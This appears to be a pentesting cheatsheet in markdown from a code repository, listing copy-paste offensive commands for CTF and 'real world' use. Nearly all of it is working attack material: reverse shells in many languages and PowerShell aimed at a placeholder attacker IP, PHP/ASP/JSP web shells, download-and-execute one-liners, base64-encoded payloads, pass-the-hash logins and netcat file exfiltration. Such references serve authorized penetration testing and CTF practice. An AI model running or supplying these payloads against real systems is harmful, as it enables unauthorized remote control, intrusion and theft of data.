Skip to content

shell-cheatsheet.md

Latest commit

 

History

History
315 lines (235 loc) · 7.96 KB

shell-cheatsheet.md

File metadata and controls

315 lines (235 loc) · 7.96 KB

Shell Cheatsheet — One Page, Everything

Bookmark this. Open it in a second tab every time you are working a box. No explanations. No fluff. Just the commands.

🎧 Listeners

# Standard
nc -lvnp 4444

# With arrow keys and history
rlwrap nc -lvnp 4444

# Auto PTY upgrade
pwncat-cs -lp 4444

# Encrypted
ncat --ssl -lvnp 4444

# Socat fully interactive
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Multiple listeners — run each in separate tab
rlwrap nc -lvnp 4444    # primary
rlwrap nc -lvnp 5555    # secondary
python3 -m http.server 80  # file server

📡 Reverse Shells — Linux

# Bash
bash -i >& /dev/tcp/YOUR-IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/YOUR-IP/4444 0>&1'

# Python3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python3 with PTY
python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("YOUR-IP",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

# Python2
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP
php -r '$sock=fsockopen("YOUR-IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Perl
perl -e 'use Socket;$i="YOUR-IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("YOUR-IP","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# Netcat with -e
nc -e /bin/bash YOUR-IP 4444

# Netcat without -e (OpenBSD)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc YOUR-IP 4444 >/tmp/f

# Socat fully interactive
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR-IP:4444

💻 Reverse Shells — Windows

# PowerShell standard
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('YOUR-IP',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# PowerShell download and execute in memory
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR-IP/shell.ps1')"

# CMD — certutil download then execute
certutil -urlcache -split -f http://YOUR-IP/nc.exe C:\Windows\Temp\nc.exe & C:\Windows\Temp\nc.exe -e cmd.exe YOUR-IP 4444

🌐 Web Shells

# PHP minimal
<?php system($_GET["cmd"]); ?>

# PHP access
http://target.com/shell.php?cmd=id
curl "http://target.com/shell.php?cmd=whoami"

# Upgrade web shell to reverse shell
curl "http://target.com/shell.php?cmd=bash+-i+>%26+/dev/tcp/YOUR-IP/4444+0>%261"
<!-- ASP -->
<% eval request("cmd") %>
<!-- JSP -->
<%Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"});%>

⬆️ Shell Upgrade — Python PTY (Full Steps)

# Step 1 — on target
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or python2: python -c 'import pty; pty.spawn("/bin/bash")'
# or script:  script /dev/null -c bash

# Step 2
Ctrl+Z

# Step 3 — on YOUR machine
stty raw -echo; fg

# Step 4
[press Enter twice]

# Step 5 — on target
export TERM=xterm

# Step 6 — on target (match your terminal dimensions)
stty rows 38 columns 116

# Check your dimensions first (in another terminal on your machine)
stty size

🏁 First Commands After Shell Lands — CTF

# 1. Stabilize immediately (see upgrade section above)
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 2. Who are you
whoami && id

# 3. Grab user flag NOW before anything drops the shell
cat /home/*/user.txt 2>/dev/null
find / -name user.txt 2>/dev/null
cat ~/user.txt

# 4. Confirm the machine
hostname && uname -a

# 5. What network
ip addr
cat /etc/hosts

🏢 First Commands After Shell Lands — Real World

# 1. Stabilize immediately
python3 -c 'import pty; pty.spawn("/bin/bash")'

# 2. Who and what
whoami && id
hostname
uname -a
cat /etc/os-release

# 3. Network
ip addr
ip route
cat /etc/hosts
ss -tlnp

# 4. Is this a container
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null

# 5. Screenshot / document everything from here

🔍 Find Your IP

# HTB — always tun0
ip addr show tun0
ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'

# General
ip addr          # Linux
ifconfig         # older Linux / macOS
ipconfig         # Windows
curl ifconfig.me # public IP

🔒 Encrypted Shells

# Ncat SSL listener
ncat --ssl -lvnp 4444

# Ncat SSL reverse shell on target
ncat --ssl YOUR-IP 4444 -e /bin/bash

# Socat SSL — generate cert first
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=localhost'
cat key.pem cert.pem > shell.pem

# Socat SSL listener
socat openssl-listen:4444,cert=shell.pem,verify=0 file:`tty`,raw,echo=0

# Socat SSL reverse shell on target
socat openssl:YOUR-IP:4444,verify=0 exec:'bash -li',pty,stderr,setsid,sigint,sane

🪟 Evil-WinRM

# Password
evil-winrm -i TARGET-IP -u username -p 'password'

# Hash
evil-winrm -i TARGET-IP -u username -H NTLM_HASH

# With scripts directory
evil-winrm -i TARGET-IP -u username -p 'password' -s /path/to/scripts/

# Upload file
upload /local/file.exe C:\Windows\Temp\file.exe

# Download file
download C:\interesting.txt /local/path/

📦 File Transfer — Quick Methods

# Python web server (on YOUR machine)
python3 -m http.server 80

# Download on Linux target
wget http://YOUR-IP/file.txt
curl http://YOUR-IP/file.txt -o file.txt

# Download on Windows target
certutil -urlcache -split -f http://YOUR-IP/file.exe file.exe
powershell -c "Invoke-WebRequest -Uri 'http://YOUR-IP/file.exe' -OutFile 'file.exe'"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://YOUR-IP/file.exe','file.exe')"

# Netcat file transfer
# Receiver: nc -lvnp 4444 > file.txt
# Sender:   nc YOUR-IP 4444 < file.txt

🔥 Firewall Bypass Ports

# When 4444 is blocked — try these
nc -lvnp 80      # HTTP
nc -lvnp 443     # HTTPS — least likely to be blocked
nc -lvnp 8080    # HTTP alternate
nc -lvnp 53      # DNS — almost never blocked outbound

🛠️ Encoded Payloads

# Base64 encode a bash reverse shell
echo -n 'bash -i >& /dev/tcp/YOUR-IP/4444 0>&1' | base64

# Execute base64 encoded payload on target
echo ENCODED_PAYLOAD | base64 -d | bash

# PowerShell base64
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://YOUR-IP/shell.ps1")'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
powershell -enc ENCODED_OUTPUT

📊 Tool Quick Reference

Need Tool
Quick listener rlwrap nc -lvnp 4444
Auto PTY pwncat-cs -lp 4444
Encrypted ncat --ssl -lvnp 4444
Full interactive socat file:\tty`,raw,echo=0 tcp-listen:4444`
Windows creds evil-winrm -i IP -u user -p pass
Windows hash evil-winrm -i IP -u user -H HASH
Port forward socat tcp-listen:PORT,fork tcp:INTERNAL:PORT
SOCKS proxy chisel

🚨 Shell Not Connecting — Quick Debug

# 1. Is listener running?        nc -lvnp 4444
# 2. Correct IP?                 ip addr show tun0
# 3. Ports match?                listener 4444, payload 4444
# 4. Try port 443                nc -lvnp 443
# 5. Try different language      bash → python3 → nc → perl
# 6. /dev/tcp blocked?           use nc named pipe method
# 7. Test ping first             tcpdump -i tun0 icmp

by SudoChef · Part of the SudoCode Pentesting Methodology Guide